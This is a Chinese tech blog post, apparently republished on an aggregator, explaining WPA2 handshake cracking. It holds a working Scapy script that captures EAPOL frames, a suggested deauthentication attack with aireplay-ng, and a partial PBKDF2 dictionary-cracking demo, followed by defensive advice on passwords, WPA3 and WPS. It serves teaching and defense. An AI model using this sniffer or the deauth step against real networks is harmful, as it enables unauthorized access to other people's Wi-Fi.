当前位置: 首页 > news >正文

Wi-Fi 破解原理与防御:用 Python + Scapy 抓取“握手包”并跑字典,硬核演示 WPA2 弱点

🚨 前言:你家的 Wi-Fi 为什么不安全?

WPA2 协议看似铜墙铁壁,但它有一个致命的设计逻辑缺陷
设备(手机/电脑)连接路由器时,必须进行**“四次握手” (4-Way Handshake)** 来验证密码是否正确。
这个过程是公开广播的。
黑客只要在旁边静静地“听”到这四次握手的数据包,把它抓回家,就可以关起门来用字典疯狂尝试密码,直到计算出的哈希值与抓到的包匹配。

攻防逻辑示意图 (Mermaid):

1. 请求连接
2. 发送随机数 Anonce
3. 发送随机数 Snonce + MIC (关键)
4. 确认

抓取握手包

跑字典/暴力破解

用户手机

路由器 AP

黑客 (监听模式)

本地电脑

得出明文密码


🛠️ 准备工作

  1. 硬件:你需要一个支持监听模式 (Monitor Mode)的无线网卡(如 RTL8812AU, AR9271 等)。
  2. 环境:Kali Linux 或 Ubuntu(Windows 下 Scapy 开启监听模式较麻烦)。
  3. 依赖
pipinstallscapy# 开启监听模式 (假设网卡是 wlan0)sudoairmon-ng start wlan0

📡 第一步:编写 Python 嗅探器抓取 EAPOL 包

WPA2 的握手包在网络协议中被称为EAPOL (Extensible Authentication Protocol over LAN)。我们要利用Scapy过滤出这种包。

核心代码 (sniffer.py):

fromscapy.allimport*importsys# 设置要监听的网卡 (通常是 wlan0mon)IFACE="wlan0mon"print(f"[*] 正在监听{IFACE}上的握手包...")defpacket_handler(pkt):# 过滤 EAPOL 协议的包ifpkt.haslayer(EAPOL):# EAPOL 包通常在 802.11 帧中ifpkt.haslayer(Dot11):# 获取发送方和接收方的 MAC 地址addr1=pkt.addr1# 接收方 (Destination)addr2=pkt.addr2# 发送方 (Source)print(f"[+] 捕获 EAPOL 包:{addr2}->{addr1}")# 将包保存到本地 pcap 文件wrpcap("handshake.pcap",pkt,append=True)# 开始嗅探# store=0 表示不在内存中保存包,防止内存溢出sniff(iface=IFACE,prn=packet_handler,store=0)

实战操作:

  1. 运行脚本。
  2. 为了加速抓包,通常会使用aireplay-ng发送**“断网攻击 (Deauth)”**,强制目标设备掉线。
  3. 目标设备自动重连时,脚本就会抓到 4 个 EAPOL 包,存入handshake.pcap

🔐 第二步:Python 模拟字典攻击 (原理演示)

抓到包后,我们如何从乱码中算出密码?
WPA2 的加密核心是PBKDF2算法。

计算公式:

简单来说:我们用字典里的密码算出 MIC,如果算出来的 MIC 和抓包里的 MIC 一样,密码就对了。

破解演示代码 (cracker.py):
(注意:Python 跑 PBKDF2 速度很慢,生产环境通常用 C 写的 aircrack-ng 或 GPU 加速的 hashcat,这里仅做原理解析)

importhashlibimporthmacfrombinasciiimporta2b_hexdefcalc_pmk(ssid,password):""" 计算成对主密钥 (PMK) 算法:PBKDF2(HMAC-SHA1, password, ssid, 4096, 32) """returnhashlib.pbkdf2_hmac('sha1',password.encode('utf-8'),ssid.encode('utf-8'),4096,32)deftry_crack(ssid,dictionary_file):print(f"[*] 开始破解 SSID:{ssid}")withopen(dictionary_file,'r',errors='ignore')asf:forlineinf:password=line.strip()iflen(password)<8:continue# 模拟计算过程(真实场景还需要结合 Anonce/Snonce 计算 PTK)# 这里仅演示最耗时的 PMK 计算步骤pmk=calc_pmk(ssid,password)# 假设我们有一个函数 check_mic(pmk, captured_packet)# if check_mic(pmk, captured_data):# print(f"🎉 密码找到: {password}")# break# 打印进度sys.stdout.write(f"\r正在尝试:{password}")sys.stdout.flush()# try_crack("MyHomeWiFi", "dict.txt")

🛡️ 防御篇:如何保护你的 Wi-Fi?

既然知道了攻击原理,防御就很有针对性了。

1. 杜绝弱密码

从原理可知,破解成功率完全取决于字典里有没有你的密码。

  • ❌ 弱密码:12345678,admin123,88888888(分分钟被秒破)。
  • ✅ 强密码:Tr0ub4dor&3(包含大小写、数字、特殊符号,且长度>12位,基本无法通过跑字典破解)。
2. 使用 WPA3

WPA3引入了SAE (对等实体同时验证)协议。

  • 它不传输易被离线破解的哈希值。
  • 即使黑客抓到了包,也无法在本地离线跑字典。
  • 建议:在路由器设置中,将加密模式改为WPA2/WPA3 混合模式仅 WPA3
3. 关闭 WPS (Wi-Fi Protected Setup)

虽然本文讲的是抓握手包,但WPS(那个为了方便连接的按钮/PIN码)是另一个巨大的安全漏洞,建议直接在路由器后台关闭。


📝 总结

通过 Python + Scapy,我们揭开了 Wi-Fi 破解的神秘面纱。
这并不是什么高深的魔法,而是利用了 WPA2 协议必须“广播握手”的特性。
作为开发者和架构师,理解攻击链条,才能设计出更安全的网络架构。

再次提醒:技术无罪,请勿作恶。保护好自己的网络,才是学习黑客技术的最终目的。

(觉得硬核?点赞、收藏,下期教你《如何用 Python 识别局域网内的 ARP 欺骗攻击》!)

http://www.jsqmd.com/news/141127/

相关文章:

  • Vetur格式化代码的正确姿势(操作指南)
  • 通俗解释Scanner类的常用方法工作流程
  • Multisim示波器在模拟电子课程中的角色:通俗解释
  • 从热效应角度分析PCB线宽和电流的关系(工业级)
  • HID设备上电枚举过程:手把手教程(硬件视角)
  • Proteus 8.16下载安装教程:适用于64位系统的实践指南
  • 零基础学习DUT验证环境构建的核心要点
  • Dify平台的客户成功案例集锦展示
  • Dify平台的伦理判断一致性测试结果
  • Dify平台的规则引擎与AI决策结合模式探讨
  • Dify平台的异步任务处理机制深度剖析
  • Dify平台的数据可视化描述生成效果展示
  • 理想二极管反向截止特性分析:系统学习基础原理
  • Dify在房地产房源描述自动生成中的实践
  • Dify平台的计费与用量统计功能实现细节
  • Dify平台的离线运行模式可行性验证
  • 超详细版USB3.0引脚定义在工业相机中的应用
  • Gerber转PCB过程中的图层对齐深度讲解
  • HBuilderX无法打开默认浏览器?核心要点快速理解
  • Dify在公益组织智能化运营中的社会价值体现
  • 一文说清JLink仿真器如何配合工业Linux系统开发
  • 【C语言】函数递归为什么那么受欢迎?
  • Dify平台的因果推理能力测试案例
  • 全面讲解es面试题:针对初级工程师的完整指南
  • Dify平台的隐私保护机制符合GDPR吗?
  • Dify平台的备份与恢复策略建议
  • Dify如何支持断网环境下的基础功能?
  • 一文说清交叉编译原理与基本工作流程
  • AXI DMA在Zynq嵌入式视觉系统中的应用详解
  • Dify如何实现跨平台消息同步?